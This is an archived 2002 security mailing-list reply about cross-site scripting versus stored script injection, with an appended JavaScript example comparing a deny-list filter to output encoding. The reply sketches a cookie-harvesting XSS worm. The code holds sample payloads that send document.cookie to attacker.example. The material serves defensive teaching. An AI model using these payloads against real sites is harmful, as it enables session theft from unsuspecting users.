WebApp Sec mailing list archives

RE: Top Ten Web App Sec Problems


From: "b0iler _" <b0iler () hotmail com>
Date: Tue, 03 Dec 2002 19:52:46 -0700

Yep, there are a lot of interesting games that can be played with XSS.
The sky is the limit.  Here are some that I know about: grab people's
email address who visit a Web site, create an email worm, order stuff
from an eCommerce site, post fake news stories at Web sites, etc.

However, my feeling is that XSS bugs haven't been exploited in the wild.
Instead people have just put together interesting demos.  If anyone can
point me to any press articles where XSS might have been used, that
would be great.

Richard

I've exploited XSS holes many times. I have heard/seen people attempt XSS exploitation many times. It is a much more targeted and specific type of attack than one in which the attacker has full power to exploit; this may be a reason behind its limited use. I'd say script injection attacks are more damaging, and exploited much more frequently than XSS.

Instead of that fake news story being up for 1 user, and only if that user is sent to the webapp with the XSS payload, the fake story would be up for every user.

It is impossible to create an email worm with XSS; since the file is stored on the server, it is a script injection type of attack. XSS works by input being echoed back to the user. Script injection is when this input is saved permanently to a file, database, etc. and then presented to the user at a later time. This makes for a more permanent attack, one that is much more likely to work. One "worm" which would work would be a normal XSS worm that chains their URLs together, perhaps querying a database for all of the URLs to hit (or hardcoding them in). This could spread from site to site, gaining cookies, URLs, and other important info. It could even spread from user to user if the XSS can send instant messages or force other users to visit HTML pages somehow (not via email; again, that is script injection).

On a related note, please remember that XSS/script injection is not just JavaScript. Other languages have their own benefits. If you are just filtering for JavaScript, it is best to add these other languages (or use a completely different system for input verification): ActiveX (OLE), VBScript (OpenScape), CSS, Shockwave, Flash, ActionScript, mocha (Netscape's JavaScript command line interpreter), LiveScript (original name of JavaScript), Java, Tcl/Tk (http://dev.scriptics.com/software/plugin/), ACUCOBOL-GT (http://www.actis.gr/prod/acucobol/webplugin.htm), Dolphin (Smalltalk, http://www.object-arts.com/Lib/EducationCentre4/htm/deployingfortheweb.htm), AppleScript, tml (http://browsex.com), and others I am unaware of. If you know of any more, please email them with a URL for more info on them.

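The following is an added example, not part of the original post or of the list archive. It illustrates two points from the reply above in plain JavaScript (runnable under Node.js): first, that input echoed straight back (the post's "XSS") reaches only the user who follows the crafted URL, while input saved and rendered later (the post's "script injection") reaches every later visitor; second, that a filter which only strips "javascript" and <script> tags leaves the other vectors the reply lists untouched, whereas encoding everything that changes the HTML context neutralises them all. The deny-list filter, the three payloads, the hostname attacker.example, the in-memory guestbook and the regex-based "active content" check are all constructed for this illustration; the vbscript: URL stands in for the non-JavaScript engines the reply mentions (it only ever ran in old Internet Explorer).

```javascript
// Added example (not from the original post): reflected vs. stored rendering,
// and a deny-list filter beside context-aware output encoding.

// Hypothetical deny-list filter, of the "just filter for javascript" kind the
// reply warns about: removes <script>...</script> blocks and javascript: URLs,
// and nothing else.
function denyListFilter(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/javascript:/gi, '');
}

// Output encoding for the HTML body context: every character that could open
// a tag, attribute or entity is turned into a character reference, so the
// browser renders the value as text whatever scripting engines it supports.
// (Attribute values and URLs need their own, context-specific encoding.)
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, c => map[c]);
}

// Reflected: the value arrives in the request and is echoed straight back.
// Only the user who was sent the crafted URL ever sees this output.
function renderSearchPage(query, escape) {
  return `<p>Results for: ${escape(query)}</p>`;
}

// Stored ("script injection" in the reply's terminology): the value is saved
// and rendered for every later visitor. An array stands in for the database.
const guestbook = [];
function postComment(text) { guestbook.push(text); }
function renderGuestbook(escape) {
  return guestbook.map(c => `<li>${escape(c)}</li>`).join('\n');
}

// Heuristic check used only for this example: does the rendered HTML still
// contain a live tag carrying a script block, an inline event handler, or a
// javascript:/vbscript: URL? Once the '<' is encoded, none of these match.
function containsActiveContent(html) {
  return /<script\b/i.test(html) ||
         /<\w+[^>]*\son\w+\s*=/i.test(html) ||
         /<\w+[^>]*\s(href|src)\s*=\s*["']?\s*(javascript|vbscript):/i.test(html);
}

// Constructed payloads: a plain <script> block (the only one the deny-list
// catches), an event-handler vector, and a non-JavaScript URL scheme.
const payloads = [
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  '<img src=x onerror="document.location=\'http://attacker.example/?c=\'+document.cookie">',
  '<a href="vbscript:MsgBox(document.cookie)">click</a>',
];

// Number of payloads that survive a given filter as active content when
// echoed back on the search page.
function survivingPayloads(escape) {
  return payloads.filter(p => containsActiveContent(renderSearchPage(p, escape))).length;
}

// Number of visitors who receive active content after a single stored post:
// with a weak filter, every render of the page is affected, not just one user.
function visitorsHitByStoredPayload(escape, visitors) {
  guestbook.length = 0;
  postComment(payloads[1]);
  let hit = 0;
  for (let i = 0; i < visitors; i++) {
    if (containsActiveContent(renderGuestbook(escape))) hit++;
  }
  return hit;
}

console.log('deny-list lets through:', survivingPayloads(denyListFilter), 'of', payloads.length);
console.log('encoding lets through: ', survivingPayloads(encodeForHtml), 'of', payloads.length);
console.log('stored payload, deny-list, 5 visitors hit:', visitorsHitByStoredPayload(denyListFilter, 5));
console.log('stored payload, encoding,  5 visitors hit:', visitorsHitByStoredPayload(encodeForHtml, 5));
```

The deny-list stops the <script> payload and nothing else; the event handler and the vbscript: URL go through untouched, and once stored they are served to every visitor of the guestbook page. Encoding on output does not try to recognise any particular language at all, which is why it covers the whole list in the reply, including the engines nobody thought to filter for.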

